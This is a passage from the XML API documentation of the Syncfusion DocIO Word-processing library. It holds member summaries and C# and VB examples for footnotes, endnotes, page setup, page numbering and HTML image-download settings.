        <member name="M:Syncfusion.DocIO.DLS.Footnote.SetOwner(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Sets the owner.
            </summary>
            <param name="document">The document.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Footnote.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Footnote.Separator">
            <summary>
            Gets or sets the footnote separator of the document.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.WTextBody"/> that represents the separator.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Footnote.ContinuationSeparator">
            <summary>
            Gets or sets the footnote continuation separator of the document.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.WTextBody"/> that represents the continuation separator.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Footnote.ContinuationNotice">
            <summary>
            Gets or sets the footnote continuation notice of the document.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.WTextBody"/> that represents the continuation notice.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.Endnote">
            <summary>
            Represents an endnote in the Word document.
            </summary>
            <example>
            <para>The following code example demonstrates how to </para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document
                WordDocument document = new WordDocument();
                //Create a section
                IWSection section = document.AddSection();
                //Add a paragraph to a section
                IWParagraph paragraph = section.AddParagraph();
                //Append the text to paragraph
                paragraph.AppendText("Working with footnotes");
                //Formatting the text
                paragraph.ApplyStyle(BuiltinStyle.Heading1);
                //Add a paragraph to  section
                paragraph = section.AddParagraph();
                //Append the endnote
                WFootnote endnote = (WFootnote)paragraph.AppendFootnote(Syncfusion.DocIO.FootnoteType.Endnote);
                WTextBody separator = document.Endnotes.Separator;
                //Replace the default foot note separate by text
                separator.Paragraphs[0].Text = "Endnote separator";
                //Set the endnote character format
                endnote.MarkerCharacterFormat.SubSuperScript = SubSuperScript.SuperScript;
                //Insert the text into the paragraph
                paragraph.AppendText("Sample content for endnotes").CharacterFormat.Bold = true;
                //Add the footnote text
                paragraph = endnote.TextBody.AddParagraph();
                paragraph.AppendText("Lorem ipsum dolor sit amet, lacus amet amet ultricies. Quisque mi venenatis morbi libero, orci dis, mi ut et class porta, massa ligula magna enim, aliquam orci vestibulum Turpis facilisis vitae consequat, cum a a,turpis dui consequat massa in dolor per, felis non amet.Auctor eleifend in omnis elit vestibulum, donec non elementum tellus est mauris, id aliquam, at lacus, arcu pretium proin lacus dolor et. Eu tortor, vel ultrices amet dignissim mauris vehicula");
                //Save and close the Word document instance
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document
                Dim document As New WordDocument()
                'Create a section
                Dim section As IWSection = document.AddSection()
                'Add a paragraph to a section
                Dim paragraph As IWParagraph = section.AddParagraph()
                'Append the text to paragraph
                paragraph.AppendText("Working with footnotes")
                'Formatting the text
                paragraph.ApplyStyle(BuiltinStyle.Heading1)
                'Add a paragraph to  section
                paragraph = section.AddParagraph()
                'Append the endnote
                Dim endnote As WFootnote = DirectCast(paragraph.AppendFootnote(Syncfusion.DocIO.FootnoteType.Endnote), WFootnote)
                Dim separator As WTextBody = document.Endnotes.Separator
                'Replace the default foot note separate by text
                separator.Paragraphs(0).Text = "Endnote separator"
                'Set the endnote character format
                endnote.MarkerCharacterFormat.SubSuperScript = SubSuperScript.SuperScript
                'Insert the text into the paragraph
                paragraph.AppendText("Sample content for endnotes").CharacterFormat.Bold = True
                'Add the footnote text
                paragraph = endnote.TextBody.AddParagraph()
                paragraph.AppendText("Lorem ipsum dolor sit amet, lacus amet amet ultricies. Quisque mi venenatis morbi libero, orci dis, mi ut et class porta, massa ligula magna enim, aliquam orci vestibulum Turpis facilisis vitae consequat, cum a a,turpis dui consequat massa in dolor per, felis non amet.Auctor eleifend in omnis elit vestibulum, donec non elementum tellus est mauris, id aliquam, at lacus, arcu pretium proin lacus dolor et. Eu tortor, vel ultrices amet dignissim mauris vehicula")
                �Save and close the Word document instance
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Endnote.m_separator">
            <summary>
            Endnote separator
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Endnote.m_continuationSeparator">
            <summary>
            Endnote continuation Separator
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Endnote.m_continuationNotice">
            <summary>
            Endnote continuation notice
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Endnote.m_ownerDoc">
            <summary>
            The owner Word document.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Endnote.#ctor(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.Endnote"/> class.
            </summary>
            <param name="document">The <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Endnote.#ctor(Syncfusion.DocIO.DLS.Endnote)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.Endnote"/> class.
            </summary>
            <param name="endnote">The endnote.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Endnote.Clone">
            <summary>
            Creates the duplicate copy of the current endnote.
            </summary>
            <returns>The cloned <see cref="T:Syncfusion.DocIO.DLS.Endnote"/> object.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Endnote.SetOwner(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Sets the owner.
            </summary>
            <param name="document">The document.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Endnote.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Endnote.Separator">
            <summary>
            Gets or sets the endnote separator of the document.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.WTextBody"/> that represents the separator.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Endnote.ContinuationSeparator">
            <summary>
            Gets or sets the endnote continuation separator of the document.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.WTextBody"/> that represents the continuation separator.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Endnote.ContinuationNotice">
            <summary>
            Gets or sets the endnote continuation notice of the document.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.WTextBody"/> that represents the continuation notice.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.ImageDownloadingFailedEventHandler">
            <summary>
            Image downloading failed event handler
            </summary>
            <param name="sender"></param>
            <param name="args"></param>
            <remarks>This delegate is not supported in MVC6 and Xamarin platforms.</remarks>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.ImageDownloadingFailedEventArgs">
            <summary>
            Represents Image downloading failed event arguments.
            </summary>
            <remarks>This class is not supported in MVC6 and Xamarin platforms.</remarks>
            <seealso cref="T:Syncfusion.DocIO.DLS.HTMLImportSettings"/>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ImageDownloadingFailedEventArgs.#ctor(System.String)">
            <summary>
            Initialize ImageDownloadingFailedEventArgs
            </summary>
            <param name="URI"></param>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ImageDownloadingFailedEventArgs.URI">
            <summary>
            Gets the image URI present in the input HTML. Read-only.
            </summary>
            <value>The <b>string</b> that specifies the URI to get image.</value>
            <remarks>This property is not supported in MVC6 and Xamarin platforms.</remarks>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ImageDownloadingFailedEventArgs.UserName">
            <summary>
            Gets or sets the user name to access the protected site.
            </summary>
            <value>The <b>string</b> that specifies the user name to get the image from protected site.</value>
            <remarks>This property is not supported in MVC6 and Xamarin platforms.</remarks>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ImageDownloadingFailedEventArgs.Password">
            <summary>
            Gets or sets the password to access the protected site.
            </summary>
            <value>The <b>string</b> that specifies the password to get the image from protected site.</value>
            <remarks>This property is not supported in MVC6 and Xamarin platforms.</remarks>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.HTMLImportSettings">
            <summary>
            Represents HTML Import Settings for HTML to Word conversion.
            </summary>
            <remarks>
            <para><c>HTMLImportSettings</c> are used to download HTTP or FTP image from secured sites. When the image downloading fails due to protection, then this <see cref="T:Syncfusion.DocIO.DLS.HTMLImportSettings"/> will throws an event which will contains the Username and Password to access the secured site.</para>
            <para>This property is not supported in MVC6 and Xamarin platforms.</para>
            </remarks>
            <example>
            <para>The following code example demonstrates how to invoke the ImageDownloadingFailedEventHandler event of HTMLImportSettings class to specify the username and password for the secured site</para>
            <code lang="C#">
                private void button_Click(object sender, EventArgs e)
                {
                    //Load an existing Word document into DocIO instance 
                    WordDocument document = new WordDocument("Template.html", FormatType.Html);
                    //Bind the method for the event ImageDownloadingFailed of HTMLImportSettings class to download the images from protected URI
                    document.HTMLImportSettings.ImageDownloadingFailed += HTMLImportSettings_ImageDownloadingFailed;
                    //Save the Word document
                    document.Save("Sample.docx", FormatType.Docx);
                    //Unbind the event
                    document.HTMLImportSettings.ImageDownloadingFailed -= HTMLImportSettings_ImageDownloadingFailed;
                    //Close the Word document
                    document.Close();
                }
                   
                void HTMLImportSettings_ImageDownloadingFailed(object sender, ImageDownloadingFailedEventArgs args)
                {
                    if (args.URI == "https:\\www.google.com")
                    {
                        args.UserName = "UserName";
                        args.Password = "Password";
                    }
                }
            </code>
            <code lang="VB">
                Private Sub button_Click(sender As Object, e As EventArgs)
                	'Load an existing Word document into DocIO instance 
                	Dim document As New WordDocument("Template.html", FormatType.Html)
                	'Bind the method for the event ImageDownloadingFailed of HTMLImportSettings class to download the images from protected URI
                	AddHandler document.HTMLImportSettings.ImageDownloadingFailed, AddressOf HTMLImportSettings_ImageDownloadingFailed
                	'Save the Word document
                	document.Save("Sample.docx", FormatType.Docx)
                	'Unbind the event
                	RemoveHandler document.HTMLImportSettings.ImageDownloadingFailed, AddressOf HTMLImportSettings_ImageDownloadingFailed
                	'Close the Word document
                	document.Close()     
                End Sub
                
                Private Sub HTMLImportSettings_ImageDownloadingFailed(sender As Object, args As ImageDownloadingFailedEventArgs)
                	If args.URI = "https:\www.google.com" Then
                		args.UserName = "UserName"
                		args.Password = "Password"
                	End If
                End Sub
            </code>
            </example>
            <seealso cref="T:Syncfusion.DocIO.DLS.ImageDownloadingFailedEventArgs"/>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLImportSettings.ExecuteImageDownloadingFailedEvent(System.String)">
            <summary>
            Execute Image downloading failed event
            </summary>
            <param name="URI"></param>
            <returns></returns>
        </member>
        <member name="E:Syncfusion.DocIO.DLS.HTMLImportSettings.ImageDownloadingFailed">
            <summary>
            Throws event when downloading of HTTP or FTP image fails from secured sites.
            </summary>
            <remarks>This event is not supported in MVC6 and Xamarin platforms.</remarks>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.WPageSetup">
            <summary>
            Represents the page setup description.
            </summary>
            <example>
            <para>The following code example demonstrates how to set the page setup properties.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                WordDocument document = new WordDocument();
                IWSection section = document.AddSection();
                //Set page setup options
                section.PageSetup.Orientation = PageOrientation.Landscape;
                section.PageSetup.Margins.All = 72;
                section.PageSetup.Borders.LineWidth = 2;
                section.PageSetup.DifferentFirstPage = true;
                section.PageSetup.DifferentOddAndEvenPages = true;
                section.PageSetup.FooterDistance = 42;
                section.PageSetup.HeaderDistance = 52;
                section.PageSetup.LineNumberingDistanceFromText = 10;
                section.PageSetup.LineNumberingMode = LineNumberingMode.Continuous;
                section.PageSetup.LineNumberingStartValue = 5;
                section.PageSetup.LineNumberingStep = 2;
                section.PageSetup.PageBorderOffsetFrom = PageBorderOffsetFrom.Text;
                section.PageSetup.PageBordersApplyType = PageBordersApplyType.AllPages;
                section.PageSetup.PageNumberStyle = PageNumberStyle.RomanUpper;
                section.PageSetup.PageSize = new SizeF(612, 792);
                section.PageSetup.PageStartingNumber = 1;
                section.PageSetup.VerticalAlignment = PageAlignment.Top;
                //Add the page number field to even footer of the document
                IWParagraph paragraph = section.HeadersFooters.EvenFooter.AddParagraph();
                paragraph.AppendText("PageNumber_EvenPageFooter ");
                paragraph.AppendField("Page", FieldType.FieldPage);
                //Add the page number field to odd footer of the document
                paragraph = section.HeadersFooters.OddFooter.AddParagraph();
                paragraph.AppendText("PageNumber_OddPageFooter ");
                paragraph.AppendField("Page", FieldType.FieldPage);
                //Add the page number field to first footer of the document
                paragraph = section.HeadersFooters.FirstPageFooter.AddParagraph();
                //Add page number field to the document
                paragraph.AppendText("PageNumber_FirstPageFooter ");
                paragraph.AppendField("Page", FieldType.FieldPage);
                //Add a paragraph to section
                paragraph = section.AddParagraph();
                //Append the text to the created paragraph
                paragraph.AppendText("Lorem ipsum dolor sit amet, lacus amet amet ultricies. Quisque mi venenatis morbi libero, orci dis, mi ut et class porta, massa ligula magna enim, aliquam orci vestibulum Turpis facilisis vitae consequat, cum a a,turpis dui consequat massa in dolor per, felis non amet.Auctor eleifend in omnis elit vestibulum, donec non elementum tellus est mauris, id aliquam, at lacus, arcu pretium proin lacus dolor et. Eu tortor, vel ultrices amet dignissim mauris vehicula");
                paragraph = section.AddParagraph();
                //Append the text to the created paragraph
                paragraph.AppendText("Lorem ipsum dolor sit amet, lacus amet amet ultricies. Quisque mi venenatis morbi libero, orci dis, mi ut et class porta, massa ligula magna enim, aliquam orci vestibulum Turpis facilisis vitae consequat, cum a a,turpis dui consequat massa in dolor per, felis non amet.Auctor eleifend in omnis elit vestibulum, donec non elementum tellus est mauris, id aliquam, at lacus, arcu pretium proin lacus dolor et. Eu tortor, vel ultrices amet dignissim mauris vehicula");
                paragraph.AppendBreak(Syncfusion.DocIO.DLS.BreakType.PageBreak);
                paragraph = section.AddParagraph();
                //Append the text to the created paragraph
                paragraph.AppendText("Lorem ipsum dolor sit amet, lacus amet amet ultricies. Quisque mi venenatis morbi libero, orci dis, mi ut et class porta, massa ligula magna enim, aliquam orci vestibulum Turpis facilisis vitae consequat, cum a a,turpis dui consequat massa in dolor per, felis non amet.Auctor eleifend in omnis elit vestibulum, donec non elementum tellus est mauris, id aliquam, at lacus, arcu pretium proin lacus dolor et. Eu tortor, vel ultrices amet dignissim mauris vehicula");
                paragraph = section.AddParagraph();
                //Append the text to the created paragraph
                paragraph.AppendText("Lorem ipsum dolor sit amet, lacus amet amet ultricies. Quisque mi venenatis morbi libero, orci dis, mi ut et class porta, massa ligula magna enim, aliquam orci vestibulum Turpis facilisis vitae consequat, cum a a,turpis dui consequat massa in dolor per, felis non amet.Auctor eleifend in omnis elit vestibulum, donec non elementum tellus est mauris, id aliquam, at lacus, arcu pretium proin lacus dolor et. Eu tortor, vel ultrices amet dignissim mauris vehicula");
                paragraph.AppendBreak(Syncfusion.DocIO.DLS.BreakType.PageBreak);
                paragraph = section.AddParagraph();
                //Append the text to the created paragraph
                paragraph.AppendText("Lorem ipsum dolor sit amet, lacus amet amet ultricies. Quisque mi venenatis morbi libero, orci dis, mi ut et class porta, massa ligula magna enim, aliquam orci vestibulum Turpis facilisis vitae consequat, cum a a,turpis dui consequat massa in dolor per, felis non amet.Auctor eleifend in omnis elit vestibulum, donec non elementum tellus est mauris, id aliquam, at lacus, arcu pretium proin lacus dolor et. Eu tortor, vel ultrices amet dignissim mauris vehicula");
                paragraph = section.AddParagraph();
                //Append the text to the created paragraph
                paragraph.AppendText("Lorem ipsum dolor sit amet, lacus amet amet ultricies. Quisque mi venenatis morbi libero, orci dis, mi ut et class porta, massa ligula magna enim, aliquam orci vestibulum Turpis facilisis vitae consequat, cum a a,turpis dui consequat massa in dolor per, felis non amet.Auctor eleifend in omnis elit vestibulum, donec non elementum tellus est mauris, id aliquam, at lacus, arcu pretium proin lacus dolor et. Eu tortor, vel ultrices amet dignissim mauris vehicula");
                //Save and close the Word document instance
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                Dim document As New WordDocument()
                Dim section As IWSection = document.AddSection()
                'Set page setup options
                section.PageSetup.Orientation = PageOrientation.Landscape
                section.PageSetup.Margins.All = 72
                section.PageSetup.Borders.LineWidth = 2
                section.PageSetup.DifferentFirstPage = True
                section.PageSetup.DifferentOddAndEvenPages = True
                section.PageSetup.FooterDistance = 42
                section.PageSetup.HeaderDistance = 52
                section.PageSetup.LineNumberingDistanceFromText = 10
                section.PageSetup.LineNumberingMode = LineNumberingMode.Continuous
                section.PageSetup.LineNumberingStartValue = 5
                section.PageSetup.LineNumberingStep = 2
                section.PageSetup.PageBorderOffsetFrom = PageBorderOffsetFrom.Text
                section.PageSetup.PageBordersApplyType = PageBordersApplyType.AllPages
                section.PageSetup.PageNumberStyle = PageNumberStyle.RomanUpper
                section.PageSetup.PageSize = New SizeF(612, 792)
                section.PageSetup.PageStartingNumber = 1
                section.PageSetup.VerticalAlignment = PageAlignment.Top
                'Add the page number field to even footer of the document
                Dim paragraph As IWParagraph = section.HeadersFooters.EvenFooter.AddParagraph()
                paragraph.AppendText("PageNumber_EvenPageFooter ")
                paragraph.AppendField("Page", FieldType.FieldPage)
                'Add the page number field to odd footer of the document
                paragraph = section.HeadersFooters.OddFooter.AddParagraph()
                paragraph.AppendText("PageNumber_OddPageFooter ")
                paragraph.AppendField("Page", FieldType.FieldPage)
                'Add the page number field to first footer of the document
                paragraph = section.HeadersFooters.FirstPageFooter.AddParagraph()
                'Add page number field to the document
                paragraph.AppendText("PageNumber_FirstPageFooter ")
                paragraph.AppendField("Page", FieldType.FieldPage)
                'Add a paragraph to section
                paragraph = section.AddParagraph()
                'Append the text to the created paragraph
                paragraph.AppendText("Lorem ipsum dolor sit amet, lacus amet amet ultricies. Quisque mi venenatis morbi libero, orci dis, mi ut et class porta, massa ligula magna enim, aliquam orci vestibulum Turpis facilisis vitae consequat, cum a a,turpis dui consequat massa in dolor per, felis non amet.Auctor eleifend in omnis elit vestibulum, donec non elementum tellus est mauris, id aliquam, at lacus, arcu pretium proin lacus dolor et. Eu tortor, vel ultrices amet dignissim mauris vehicula")
                paragraph = section.AddParagraph()
                'Append the text to the created paragraph
                paragraph.AppendText("Lorem ipsum dolor sit amet, lacus amet amet ultricies. Quisque mi venenatis morbi libero, orci dis, mi ut et class porta, massa ligula magna enim, aliquam orci vestibulum Turpis facilisis vitae consequat, cum a a,turpis dui consequat massa in dolor per, felis non amet.Auctor eleifend in omnis elit vestibulum, donec non elementum tellus est mauris, id aliquam, at lacus, arcu pretium proin lacus dolor et. Eu tortor, vel ultrices amet dignissim mauris vehicula")
                paragraph.AppendBreak(Syncfusion.DocIO.DLS.BreakType.PageBreak)
                paragraph = section.AddParagraph()
                'Append the text to the created paragraph
                paragraph.AppendText("Lorem ipsum dolor sit amet, lacus amet amet ultricies. Quisque mi venenatis morbi libero, orci dis, mi ut et class porta, massa ligula magna enim, aliquam orci vestibulum Turpis facilisis vitae consequat, cum a a,turpis dui consequat massa in dolor per, felis non amet.Auctor eleifend in omnis elit vestibulum, donec non elementum tellus est mauris, id aliquam, at lacus, arcu pretium proin lacus dolor et. Eu tortor, vel ultrices amet dignissim mauris vehicula")
                paragraph = section.AddParagraph()
                'Append the text to the created paragraph
                paragraph.AppendText("Lorem ipsum dolor sit amet, lacus amet amet ultricies. Quisque mi venenatis morbi libero, orci dis, mi ut et class porta, massa ligula magna enim, aliquam orci vestibulum Turpis facilisis vitae consequat, cum a a,turpis dui consequat massa in dolor per, felis non amet.Auctor eleifend in omnis elit vestibulum, donec non elementum tellus est mauris, id aliquam, at lacus, arcu pretium proin lacus dolor et. Eu tortor, vel ultrices amet dignissim mauris vehicula")
                paragraph.AppendBreak(Syncfusion.DocIO.DLS.BreakType.PageBreak)
                paragraph = section.AddParagraph()
                'Append the text to the created paragraph
                paragraph.AppendText("Lorem ipsum dolor sit amet, lacus amet amet ultricies. Quisque mi venenatis morbi libero, orci dis, mi ut et class porta, massa ligula magna enim, aliquam orci vestibulum Turpis facilisis vitae consequat, cum a a,turpis dui consequat massa in dolor per, felis non amet.Auctor eleifend in omnis elit vestibulum, donec non elementum tellus est mauris, id aliquam, at lacus, arcu pretium proin lacus dolor et. Eu tortor, vel ultrices amet dignissim mauris vehicula")
                paragraph = section.AddParagraph()
                'Append the text to the created paragraph
                paragraph.AppendText("Lorem ipsum dolor sit amet, lacus amet amet ultricies. Quisque mi venenatis morbi libero, orci dis, mi ut et class porta, massa ligula magna enim, aliquam orci vestibulum Turpis facilisis vitae consequat, cum a a,turpis dui consequat massa in dolor per, felis non amet.Auctor eleifend in omnis elit vestibulum, donec non elementum tellus est mauris, id aliquam, at lacus, arcu pretium proin lacus dolor et. Eu tortor, vel ultrices amet dignissim mauris vehicula")
                'Save and close the Word document instance
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
            <seealso cref="P:Syncfusion.DocIO.DLS.WPageSetup.PageNumbers"/>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WPageSetup.DEF_PAGE_WIDTH">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WPageSetup.DEF_PAGE_HEIGHT">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WPageSetup.DEF_PAGE_MARGINS">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WPageSetup.DEF_PAGE_MARGIN_LEFT">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WPageSetup.DEF_AUTO_TAB_LENGHT">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WPageSetup.DEF_AR_TO_LETTER_LIMIT">
            <summary>
            Limit number of converting arabic to \"A\" format.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WPageSetup.DEF_A_ASCII_INDEX">
            <summary>
            Index of A char in the ASCII table.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WPageSetup.m_pageSize">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WPageSetup.m_fHeaderDistance">
            <summary>
            <exclude/>
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WPageSetup.m_fFooterDistance">
            <summary>
            <exclude/>
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WPageSetup.m_bFlags">
            <summary>
            The title page mark
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WPageSetup.m_fDefaultTabWidth">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WPageSetup.m_lineNumberingMode">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WPageSetup.m_lineNumberingMod">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WPageSetup.m_lineNumberingStartValue">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WPageSetup.m_distanceFromText">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WPageSetup.m_pageBorderApply">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WPageSetup.m_pageBorderOffsetFrom">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WPageSetup.m_pageBorderIsInFront">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WPageSetup.m_borders">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WPageSetup.m_isBidi">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WPageSetup.m_equalColWidth">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WPageSetup.m_pageNumberStyle">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WPageSetup.m_pageNumberStartAt">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WPageSetup.m_pageNumberRestart">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WPageSetup.m_linePitch">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WPageSetup.m_pitchType">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WPageSetup.m_drawLinesBetwCols">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WPageSetup.m_hasLineNum">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WPageSetup.m_isUpdated">
            <summary>
            Destined when Page Setup is read
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WPageSetup.m_pageNumbers">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WPageSetup.m_endnoteNumberFormat">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WPageSetup.m_footnoteNumberFormat">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WPageSetup.m_restartIndexForEndnote">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WPageSetup.m_endnotePosition">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WPageSetup.m_restartIndexForFootnotes">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WPageSetup.m_footnotePosition">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WPageSetup.m_initialEndnoteNumber">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WPageSetup.m_initialFootnoteNumber">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WPageSetup.m_firstPageTray">
            <summary>
            First paper source 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WPageSetup.m_otherPagesTray">
            <summary>
            Other paper source
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WPageSetup.#ctor(Syncfusion.DocIO.DLS.WSection)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WPageSetup"/> class.
            </summary>
            <param name="sec">The sec.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WPageSetup.SetPageSetupProperty(System.String,System.Object)">
            <summary>
            Sets the property value for page setup property.
            </summary>
            <param name="sec">Name of the property.</param>
            <param name="sec">Value of the property.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WPageSetup.InitializeDocxPageSetup">
            <summary>
            Initializes page setup for .docx format
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WPageSetup.InsertPageNumbers(System.Boolean,Syncfusion.DocIO.DLS.PageNumberAlignment)">
            <summary>
            Inserts the page numbers.
            </summary>
            <param name="topOfPage"><b>True</b> to insert the page number at the top of the page; <b>False</b> to insert the page number at the bottom of the page.</param>
            <param name="horizontalAlignment">The horizontal alignment of the page number.</param>
            <example>
            <para>The following code example demonstrates how to insert page number.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document
                WordDocument document = new WordDocument();
                //Add the section into Word document
                IWSection section = document.AddSection();
                section.PageSetup.PageStartingNumber = 1;
                section.PageSetup.RestartPageNumbering = true;
                section.PageSetup.PageNumberStyle = PageNumberStyle.Arabic;
                section.PageSetup.InsertPageNumbers(false, PageNumberAlignment.Center);
                //Add the paragraph
                IWParagraph paragraph = section.AddParagraph();
                //Append the text to the created paragraph
                paragraph.AppendText("Lorem ipsum dolor sit amet, lacus amet amet ultricies. Quisque mi venenatis morbi libero, orci dis, mi ut et class porta, massa ligula magna enim, aliquam orci vestibulum Turpis facilisis vitae consequat, cum a a,turpis dui consequat massa in dolor per, felis non amet.Auctor eleifend in omnis elit vestibulum, donec non elementum tellus est mauris, id aliquam, at lacus, arcu pretium proin lacus dolor et. Eu tortor, vel ultrices amet dignissim mauris vehicula");
                //Save and close the Word document instance
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document
                Dim document As New WordDocument()
                'Add the section into Word document
                Dim section As IWSection = document.AddSection()
                section.PageSetup.PageStartingNumber = 1
                section.PageSetup.RestartPageNumbering = True
                section.PageSetup.PageNumberStyle = PageNumberStyle.Arabic
                section.PageSetup.InsertPageNumbers(False, PageNumberAlignment.Center)
                'Add the paragraph
                Dim paragraph As IWParagraph = section.AddParagraph()
                'Append the text to the created paragraph
                paragraph.AppendText("Lorem ipsum dolor sit amet, lacus amet amet ultricies. Quisque mi venenatis morbi libero, orci dis, mi ut et class porta, massa ligula magna enim, aliquam orci vestibulum Turpis facilisis vitae consequat, cum a a,turpis dui consequat massa in dolor per, felis non amet.Auctor eleifend in omnis elit vestibulum, donec non elementum tellus est mauris, id aliquam, at lacus, arcu pretium proin lacus dolor et. Eu tortor, vel ultrices amet dignissim mauris vehicula")
                'Save and close the Word document instance
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WPageSetup.GetAsRoman(System.Int32)">
            <summary>
            
            </summary>
            <param name="number"></param>
            <returns></returns>
        </member>
